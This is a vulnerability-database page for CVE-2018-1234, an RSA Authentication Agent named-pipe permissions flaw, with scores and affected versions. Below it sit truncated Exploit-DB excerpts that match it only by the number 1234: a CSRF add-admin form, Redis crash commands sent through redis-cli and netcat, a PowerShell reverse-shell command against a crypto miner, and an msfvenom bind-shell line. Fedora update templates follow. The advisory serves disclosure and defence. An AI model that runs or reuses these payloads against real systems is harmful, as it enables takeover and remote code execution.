CVE-2018-1234
published 2018-03-30CVE-2018-1234: RSA Authentication Agent version 8.0.1 and earlier for Web for IIS is affected by a problem where access control list (ACL) permissions on a Windows Named Pipe…
PriorityP428medium5.5CVSS 3.0
AVLACLPRLUINSUCHINAN
EPSS
0.46%
36.6th percentile
RSA Authentication Agent version 8.0.1 and earlier for Web for IIS is affected by a problem where access control list (ACL) permissions on a Windows Named Pipe were not sufficient to prevent access by unauthorized users. The attacker with local access to the system can exploit this vulnerability to read configuration properties for the authentication agent.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dell_emc | rsa_authentication_agent_for_web_for_iis | — | — |
| rsa | authentication_agent_for_web | <= 8.0.1 | — |
CVSS provenance
nvdv3.05.5MEDIUMCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
nvdv2.02.1LOWAV:L/AC:L/Au:N/C:P/I:N/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
exploitdb·2018-12-24·CVSS 8.8
CVE-2018-19138 [HIGH] WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
---
# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-23
# Exploit Author: linfeng
# Vendor Homepage:https://github.com/wstmall/wstmart/
# Software Link:http://www.wstmart.net/
# Version: WSTMart 2.0.8_181212
# CVE :CVE-2018-19138
# 0x02 CSRF PoC
# 18/5000
# Function point: background management - staff management - login account
# poc:
# 1234.html
Document
test.staffId.value="0";
test.loginName.value="admin3";
test.staffPhoto.value="";
test.loginPwd.value="admin3";
test.staffName.value="admin3";
test.staffNo.value="";
test.RoleId.value="0";
test.staffPhone.value="";
test.wxOpenId.value="";
test.workStatus.value="1";
test.staffStatus.value="1";
test.submit();
Exploit-DB
Redis 5.0 - Denial of Service
exploitdb·2018-06-20·CVSS 7.5
CVE-2018-12453 [HIGH] Redis 5.0 - Denial of Service
Redis 5.0 - Denial of Service
---
# Exploit Title: Redis 5.0 Denial of Service
# Date: 2018-06-13
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/download
# Version: 5.0
# Fixed on: 5.0
# CVE : CVE-2018-12453
Type confusion in the xgroupCommand function in t_stream.c in redis-server in Redis before 5.0 allows remote attackers to cause denial-of-service via an XGROUP command in which the key is not a stream.
PoC:
$ ./src/redis-cli -p 1234
127.0.0.1:1234> set a 123
OK
127.0.0.1:1234> xgroup create a b $
Error: Connection reset by peer
The bug also could be triggered via netcat
$ nc 127.0.0.1 1234
set a 123
+OK
xgroup create a b $ argc >= 4) {
robj *o = lookupKeyWriteOrReply(c,c->argv[2],shared.nokeyerr);
- if (o == N
Exploit-DB
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
exploitdb·2018-05-17
CVE-2018-1000049 Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
---
# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Date: 2018/02/09
# Exploit Author: ReverseBrain
# Vendor Homepage: https://nanopool.org/
# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Leng
Exploit-DB
DVD X Player Standard 5.5.3.9 - Buffer Overflow
exploitdb·2018-04-10·CVSS 7.8
CVE-2018-9128 [HIGH] DVD X Player Standard 5.5.3.9 - Buffer Overflow
DVD X Player Standard 5.5.3.9 - Buffer Overflow
---
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################
# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from th
Bugzilla
CVE-2018-12015 perl-Archive-Tar: perl: Directory traversal in Archive::Tar [fedora-all]
bugzilla·2018-06-14·CVSS 7.5
CVE-2018-12015 [HIGH] CVE-2018-12015 perl-Archive-Tar: perl: Directory traversal in Archive::Tar [fedora-all]
CVE-2018-12015 perl-Archive-Tar: perl: Directory traversal in Archive::Tar [fedora-all]
Use the following template to for the 'fedpkg update' request to submit an
update for this issue as it contains the top-level parent bug(s) as well as
this tracking bug. This will ensure that all associated bugs get updated
when new packages are pushed to stable.
# bugfix, security, enhancement, newpackage (required)
type=security
# testing, stable
request=testing
# Bug numbers: 1234,9876
bugs=1588760,1591205
# Description of your update
notes=Security fix for [PUT CVEs HERE]
# Enable request automation based on the stable/unstable karma thresholds
autokarma=True
stable_karma=3
unstable_karma=-3
# Automatically close bugs when this marked as stable
close_bugs=True
# Suggest that users restart a
Bugzilla
CVE-2018-1115 mingw-postgresql: postgresql: Too-permissive access control list on function pg_logfile_rotate() [epel-7]
bugzilla·2018-05-10·CVSS 9.1
CVE-2018-1115 [CRITICAL] CVE-2018-1115 mingw-postgresql: postgresql: Too-permissive access control list on function pg_logfile_rotate() [epel-7]
CVE-2018-1115 mingw-postgresql: postgresql: Too-permissive access control list on function pg_logfile_rotate() [epel-7]
Use the following template to for the 'fedpkg update' request to submit an
update for this issue as it contains the top-level parent bug(s) as well as
this tracking bug. This will ensure that all associated bugs get updated
when new packages are pushed to stable.
# bugfix, security, enhancement, newpackage (required)
type=security
# testing, stable
request=testing
# Bug numbers: 1234,9876
bugs=1573276,1576771
# Description of your update
notes=Security fix for [PUT CVEs HERE]
# Enable request automation based on the stable/unstable karma thresholds
autokarma=True
stable_karma=3
unstable_karma=-3
# Automatically close bugs when this marked as stable
close_bugs=True
2018-03-30
Published